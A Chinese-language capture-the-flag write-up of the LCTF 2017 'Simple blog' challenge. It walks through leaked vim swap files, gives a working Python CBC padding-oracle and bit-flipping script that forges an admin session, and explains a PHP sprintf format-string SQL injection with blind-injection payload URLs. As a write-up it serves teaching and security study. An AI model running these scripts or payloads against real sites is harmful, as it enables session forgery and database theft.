Chybeta

LCTF 2017-Simple blog-writeup

更新:

  1. CBC翻转攻击脚本
  2. 格式化字符串sql注入详细解答

趁着期中考,复习累了做几道ctf玩玩,只做出来3道web。感谢师傅们出的题!

LCTF 2017-Simple blog-writeup

Task

1
2
A simple blog .To discover the secret of it.
http://111.231.111.54/

Solution

源码泄露

1
2
http://111.231.111.54/.login.php.swp
http://111.231.111.54/.admin.php.swp

下载下来后,用vim -r恢复,得到源代码:

login.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
<?php
error_reporting(0);
session_start();
define("METHOD", "aes-128-cbc");
include('config.php');
function show_page(){
echo '省略';
}
function get_random_token(){
$random_token = '';
$str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890";
for($i = 0; $i < 16; $i++){
$random_token .= substr($str, rand(1, 61), 1);
}
return $random_token;
}
function get_identity(){
global $id;
$token = get_random_token();
$c = openssl_encrypt($id, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token);
$_SESSION['id'] = base64_encode($c);
setcookie("token", base64_encode($token));
if($id === 'admin'){
$_SESSION['isadmin'] = 1;
}else{
$_SESSION['isadmin'] = 0;
}
}
function test_identity(){
if (isset($_SESSION['id'])) {
$c = base64_decode($_SESSION['id']);
$token = base64_decode($_COOKIE["token"]);
if($u = openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token)){
if ($u === 'admin') {
$_SESSION['isadmin'] = 1;
return 1;
}
}else{
die("Error!");
}
}
return 0;
}
if(isset($_POST['username'])&&isset($_POST['password'])){
$username = mysql_real_escape_string($_POST['username']);
$password = $_POST['password'];
$result = mysql_query("select password from users where username='" . $username . "'", $con);
$row = mysql_fetch_array($result);
if($row['password'] === md5($password)){
get_identity();
header('location: ./admin.php');
}else{
die('Login failed.');
}
}else{
if(test_identity()){
header('location: ./admin.php');
}else{
show_page();
}
}
?>

admin.php的源码后面放出。

经过测试,存在账号和密码,分别为admin和admin。在login.php页面登陆后会跳转到admin.php。默认情况下,由于并非真实admin,在跳转后会显示you are not admin.

CBC翻转字节攻击

鉴于篇幅的原因,关于CBC翻转字节攻击这里就不多讲了。在观察login.php,以及加上一点点的社工后,可以发现跟NJCTF的某题神似。借网络的脚本,修改了一下,增加登陆页面的验证以及跑出token后的结束标志:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
import requests
import base64
url='http://111.231.111.54/login.php'
N=16
def inject_token(token):
header={"Cookie":"PHPSESSID="+phpsession+";token="+token}
result=requests.post(url,headers=header)
return result
def xor(a, b):
return "".join([chr(ord(a[i])^ord(b[i%len(b)])) for i in xrange(len(a))])
def pad(string,N):
l=len(string)
if l!=N:
return string+chr(N-l)*(N-l)
def padding_oracle(N):
get=""
for i in xrange(1,N+1):
for j in xrange(0,256):
padding=xor(get,chr(i)*(i-1))
c=chr(0)*(16-i)+chr(j)+padding
result=inject_token(base64.b64encode(c))
if "Error!" not in result.content:
get=chr(j^i)+get
break
return get
def login(url):
payload = {
"username":"admin",
"password":"admin"
}
coo1 = {
"PHPSESSID":"j297k7o6d8stcbvi2c23naj5j6"
}
r = requests.post(url,cookies=coo1,data=payload,allow_redirects=False)
token = r.headers['Set-Cookie'].replace("%3D",'=').replace("%2F",'/').replace("%2B",'+').decode('base64')
session = "j297k7o6d8stcbvi2c23naj5j6"
return session, token
while 1:
phpsession,token = login(url)
middle1=padding_oracle(N)
print middle1
print "\n"
if(len(middle1)+1==16):
for i in xrange(0,256):
middle=chr(i)+middle1
print "token:"+token
print "middle:"+middle
plaintext=xor(middle,token);
print "plaintext:"+plaintext
des=pad('admin',N)
tmp=""
print des.encode("base64")
for i in xrange(16):
tmp+=chr(ord(token[i])^ord(plaintext[i])^ord(des[i]))
print tmp.encode('base64')
result=inject_token(base64.b64encode(tmp))
# print result.content
if "Login Form" not in result.content and "Error" not in result.content:
print result.content
print "success"
exit()

得到:

1
2
token HGV8cWwzDgk2CBooPRYtXA==
PHPSESSID j297k7o6d8stcbvi2c23naj5j6

成功进入后台。

格式化串sql注入

这里放上admin.php的源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
error_reporting(0);
session_start();
include('config.php');
if(!$_SESSION['isadmin']){
die('You are not admin');
}
if(isset($_GET['id'])){
$id = mysql_real_escape_string($_GET['id']);
if(isset($_GET['title'])){
$title = mysql_real_escape_string($_GET['title']);
$title = sprintf("AND title='%s'", $title);
}else{
$title = '';
}
$sql = sprintf("SELECT * FROM article WHERE id='%s' $title", $id);
$result = mysql_query($sql,$con);
$row = mysql_fetch_array($result);
if(isset($row['title'])&&isset($row['content'])){
echo "<h1>".$row['title']."</h1><br>".$row['content'];
die();
}else{
die("This article does not exist.");
}
}
?>

在看到sprintf后,可以很直接的联系到前阵子爆出的关于wordpress的格式化字符串SQL注入漏洞。传送门:从WordPress SQLi谈PHP格式化字符串问题(2017.11.01更新)

基于泄露出的源码,添加一些变量打印语句,本地测试代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
$con = mysql_connect("localhost", "root", "root");
if(isset($_GET['id'])){
print_r("GET[id] => ".$_GET['id']."</br>");
$id = mysql_real_escape_string($_GET['id'],$con);
print_r("\$id => ".$id."</br>");
if(isset($_GET['title'])){
print_r("GET[title] => ".$_GET['title']."</br>");
$title = mysql_real_escape_string($_GET['title']);
print_r("escape string tile: \$title => ".$title."</br>");
$title = sprintf("AND title='%s'", $title);
print_r("After first sprintf : \$title => ".$title."</br>");
}else{
$title = '';
}
$sql = sprintf("SELECT * FROM article WHERE id='%s' $title", $id);
print_r("sql => ".$sql);
}
?>

payload:

1
http://127.0.0.1:2500/index.php?id=1&title=flag%1$'%20 or 1=1%23

观察传入的title参数。

title传入的值为flag%1$' or 1=1#,经过mysql_real_escape_string,会使得单引号'前加上斜杠,也就是图片中的第四行:

1
escape string tile: $title => flag%1$\' or 1=1#

接下来执行一次sprintf("AND title='%s'", $title);,也就是将前面得到的title值title值为:

1
After first sprintf : $title => AND title='flag%1$\' or 1=1#'

接下来,又一次执行了sprintf

1
sprintf("SELECT * FROM article WHERE id='%s' AND title='flag%1$\' or 1=1#'", $id);

由于PHP的sprintf中,%1$\这样的语法,百分号%后面的数表示使用第几个参数,$后面的表示类型,常见的类型比如s表示字符串等等。比如%1$s,表示使用第一个参数,类型为字符串(%s)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
// 注format中,为防止 $ 被转义,在前面加了转义符。对于sprintf来说,即 %1$s
$format1 = "hello,%1\$s one<br/>";
$format2 = "hello,%2\$s two<br/>";
$format3 = "hello,%1\$\' three<br/>";
$format4 = "hello,%\$\' four<br/>";
print_r("format string 1 : ".$format1);
print_r("Result: ".sprintf($format1,"chybeta-1","chybeta-2"));
print_r("format string 2 : ".$format2);
print_r("Result: ".sprintf($format2,"chybeta-1","chybeta-2"));
print_r("format string 3 : ".$format3);
print_r(sprintf($format3,"chybeta-1","chybeta-2"));
print_r("format string 4 : ".$format4);
print_r(sprintf($format4,"chybeta-1","chybeta-2"));
?>

前两个示例是演示选择参数的用法。第三个和前两个比较,变成类型%\,会直接跳过不处理,并直接输出。第四个和第三个对比,少了参数选择,这会导致报错,无法正常打印。

回到前面的sprintf

1
sprintf("SELECT * FROM article WHERE id='%s' AND title='flag%1$\' or 1=1#'", $id);

通过百分号后的1,选择了一个参数(即id)不会爆错。利用类型%\,使得跳过。而原本在\后面的单引号,由于前面斜杠被当作了sprintf的类型,得以成功逃逸。

剩下的工作就是盲注了,比如:

1
http://111.231.111.54/admin.php?id=1&title=flag%1$'%20 or (SELECT%09GROUP_CONCAT(f14g)%09FROM%09web1.key) < 255 #

脚本写得太丑,基于以前的写的框架修改的,这里就不贴啦。

最后注出来的表结构如下:

1
2
3
数据库:web1
表名:key
字段名:f14g

flag:

1
LCTF{N0!U_hacked_My_b1og}

回到PHP的sprintf中,sprintf能吃掉\呢?在源码中,采用了case进行分类处理,而对于未知情况,则采取break。明显%\是未知情况,因此成功绕过。

小结

  • 源码泄露
  • CBC翻转字节攻击
  • 格式化串sql注入
微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】

本文标题:LCTF 2017-Simple blog-writeup

文章作者:chybeta

发布时间:2017年11月18日 - 22:11

最后更新:2017年11月22日 - 22:11

原始链接:http://chybeta.github.io/2017/11/18/LCTF-2017-Simple-blog-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。